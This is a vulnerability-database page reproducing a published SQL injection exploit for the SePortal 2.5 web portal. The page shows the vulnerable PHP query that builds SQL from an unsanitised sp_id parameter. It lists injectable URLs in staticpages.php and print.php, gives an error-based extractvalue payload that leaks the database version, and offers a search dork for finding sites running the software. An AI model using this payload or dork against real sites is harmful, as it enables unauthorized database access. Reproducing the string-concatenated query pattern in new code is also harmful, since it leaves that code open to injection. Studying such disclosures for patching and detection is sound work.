Lucene search
+L

SePortal 2.5 - SQL Injection (2)

🗓️ 19 Mar 2014 00:00:00Reported by jsassType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

SePortal 2.5 SQL Injection Vulnerability, version 2.5, tested on Linux Ubuntu 12.4 & Windows 7, exploit details, contact Twitter: @Kwsecurit

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
SePortal 2.5 SQL Injection / Remote Code Execution Exploit
29 Mar 201400:00
zdt
circl
Circl
CVE-2008-5191
27 Jun 200800:00
circl
checkpoint_advisories
Check Point Advisories
SePortal staticpages SQL Injection (CVE-2008-5191)
15 Jun 201400:00
checkpoint_advisories
cve
CVE
CVE-2008-5191
21 Nov 200817:00
cve
cvelist
Cvelist
CVE-2008-5191
21 Nov 200817:00
cvelist
exploitdb
Exploit DB
SePortal 2.5 - SQL Injection / Remote Code Execution (Metasploit)
31 Mar 201400:00
exploitdb
exploitdb
Exploit DB
SePortal 2.4 - 'poll_id' SQL Injection
27 Jun 200800:00
exploitdb
metasploit
Metasploit
SePortal SQLi Remote Code Execution
20 Mar 201400:00
metasploit
nvd
NVD
CVE-2008-5191
21 Nov 200817:30
nvd
openvas
OpenVAS
SePortal poll.php SQL Injection Vulnerability
27 Nov 200800:00
openvas
Rows per page
####################################################################
Exploit: SePortal 2.5 Sql Injection Vulnerabilty
Author: jsass
Date  : 19\03\2014
Contact Twitter: @Kwsecurity
Script: http://www.seportal.org/
version: 2.5
Tested on: Linux Ubuntu 12.4 & Windows 7
Dork : "Powered by SePortal 2.5"

//** Searching And  Analysis By Kuwaity Crew **\\

####################################################################
      SQL INJECTION Vulnerabilty

       code :
 $main_template = 'staticpages';

define('GET_CACHES', 1);
define('ROOT_PATH', './');
define('GET_USER_ONLINE', 1);
define('GET_STATS_BOX', 1);
include(ROOT_PATH.'global.php');
require(ROOT_PATH.'includes/sessions.php');

  $sql = "SELECT *
          FROM ".STATICPAGE_TABLE."
          WHERE sp_id = '".$sp_id."'";
  $result = $site_db->query($sql);

      files:
  staticpages.php?sp_id=(inject here)
  print.php?mode=staticpage&client=printer&sp_id=(inject here)

example:

http://localhost/seportal2.5/staticpages.php?sp_id=1%27%20%20and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--%20-

//////////////////////////////////////////////////////////////////////////////////




 Greats: dzkabyle & Mr.Exit & massacreur & rDNix & hamza & Q8 Spy & الشبح الدموي & medo medo & sec4ever.com & is-sec.com

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Dec 2016 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.17581
30